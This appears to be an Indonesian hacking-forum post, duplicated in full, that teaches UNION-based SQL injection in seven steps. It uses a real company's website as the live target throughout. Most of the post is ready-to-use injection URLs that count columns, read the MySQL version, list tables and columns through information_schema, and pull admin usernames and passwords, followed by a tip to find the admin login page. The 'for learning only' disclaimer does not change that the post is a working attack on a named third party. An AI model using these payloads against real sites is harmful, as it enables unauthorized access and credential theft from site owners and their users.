SQL Injection Real Version (1)
Halaman 1 dari 1
SQL Injection Real Version (1)
nah Teman-teman sekalian... disini ane akan menerangkan tentang pembahasan basi menurut master diluar sana, tapi menurut ane sangat bagus untuk newbie(org baru) seperti ane
Pengertian sql injection:
SQL injection adalah sebuah aksi DEFACER/HACKING yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x, tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: http://www.hindustanimpex.co.in/products.php?catcode=1
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
http://www.hindustanimpex.co.in/products.php?catcode=1' atau
http://www.hindustanimpex.co.in/products.php?catcode=-1
sehingga muncul pesan error seperti berikut :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/hind9098/public_html/products.php on line 61( dan masih banyak lagi)
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order+by
contoh:
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+1-- atau
ceklah secara step by step (satupersatu) untuk mengetahui vuln(kerusakan web itu)...
misal:
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+1--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+2--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+3--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+4--
lanjutin yach 5, 6, 7, 8, 9, 10
sehingga muncul error atau hilang pesan error...
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+11--
berarti yang kita ambil adalah sampai angka 11
menjadi = http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+11--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union+select
karena tadi error sampai angka 11
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,2,3,4,5,6,7,8,9,10--
ok seumpama yg keluar angka 5
contoh versi : 5.0.89-community
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tersebut pada angka yg keluar tadi
misal: http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,version(),3,4,5,6,7,8,9,10--
atau
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,@@version,3,4,5,6,7,8,9,10--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
===========
=step Empat:=
===========
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables--
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- >>> dimasukan setelah angka terakhir
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--
=============
= step Lima: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah [color=red]+from+information_schema.columns+where+table_name=0xhexadecimal-- >>> dimasukan setelah angka terakhir
mejadi seperti :
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x61646D696E
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/
contoh kata yg ingin di konversi Ascii ke Hex yaitu admin maka akan menjadi 61:64:6d:69:6e jadi kayak gini.. titik dua dihapus>>>61646D696E
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x61646D696E
============
=step Enam:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8,9,10+from+(nama table berasal)--
contoh kata yang keluar adalah username,password
Contoh sitenya :
http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,concat_ws(0x3a,username,0x3a,password),3,4,5,6,7,8,9,10+from+admin--
=============
=Step Tujuh:=
=============
username & password udah ditangan...
langsung cari page admin loginnya...
bisa cari dengan tool ini (http://tool-of-fudc.isgreat.org)
terserah mau diapain... tapi ingat diatas langit masih ada langit yang lebih tinggi
----------------------------------------------------------------------------------
NB : tutorial ini hanyalah untuk pembelajaran, hanya untuk melihat kelemahan suatu sistem, tidak untuk merusak sistem...
Creator : syafm0vic007
Team : i-TOFU(IT-Team Of Fatihul Ulum), CyberJihadCommunity, IndonesianHackerTeam, Devilzc0de, Jasakom, and all team hacker in Indonesian
Thank's : All myFriend in Indonesian... love you all..
----------------------------------------------------------------------------------
Pengertian sql injection:
SQL injection adalah sebuah aksi DEFACER/HACKING yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x, tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: http://www.hindustanimpex.co.in/products.php?catcode=1
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
http://www.hindustanimpex.co.in/products.php?catcode=1' atau
http://www.hindustanimpex.co.in/products.php?catcode=-1
sehingga muncul pesan error seperti berikut :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/hind9098/public_html/products.php on line 61( dan masih banyak lagi)
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order+by
contoh:
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+1-- atau
ceklah secara step by step (satupersatu) untuk mengetahui vuln(kerusakan web itu)...
misal:
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+1--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+2--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+3--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+4--
lanjutin yach 5, 6, 7, 8, 9, 10
sehingga muncul error atau hilang pesan error...
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+11--
berarti yang kita ambil adalah sampai angka 11
menjadi = http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+11--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union+select
karena tadi error sampai angka 11
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,2,3,4,5,6,7,8,9,10--
ok seumpama yg keluar angka 5
contoh versi : 5.0.89-community
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tersebut pada angka yg keluar tadi
misal: http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,version(),3,4,5,6,7,8,9,10--
atau
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,@@version,3,4,5,6,7,8,9,10--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
===========
=step Empat:=
===========
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables--
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- >>> dimasukan setelah angka terakhir
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--
=============
= step Lima: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah [color=red]+from+information_schema.columns+where+table_name=0xhexadecimal-- >>> dimasukan setelah angka terakhir
mejadi seperti :
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x61646D696E
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/
contoh kata yg ingin di konversi Ascii ke Hex yaitu admin maka akan menjadi 61:64:6d:69:6e jadi kayak gini.. titik dua dihapus>>>61646D696E
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x61646D696E
============
=step Enam:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8,9,10+from+(nama table berasal)--
contoh kata yang keluar adalah username,password
Contoh sitenya :
http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,concat_ws(0x3a,username,0x3a,password),3,4,5,6,7,8,9,10+from+admin--
=============
=Step Tujuh:=
=============
username & password udah ditangan...
langsung cari page admin loginnya...
bisa cari dengan tool ini (http://tool-of-fudc.isgreat.org)
terserah mau diapain... tapi ingat diatas langit masih ada langit yang lebih tinggi
----------------------------------------------------------------------------------
NB : tutorial ini hanyalah untuk pembelajaran, hanya untuk melihat kelemahan suatu sistem, tidak untuk merusak sistem...
Creator : syafm0vic007
Team : i-TOFU(IT-Team Of Fatihul Ulum), CyberJihadCommunity, IndonesianHackerTeam, Devilzc0de, Jasakom, and all team hacker in Indonesian
Thank's : All myFriend in Indonesian... love you all..
----------------------------------------------------------------------------------
syaf- Pejuang
- Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik
|
|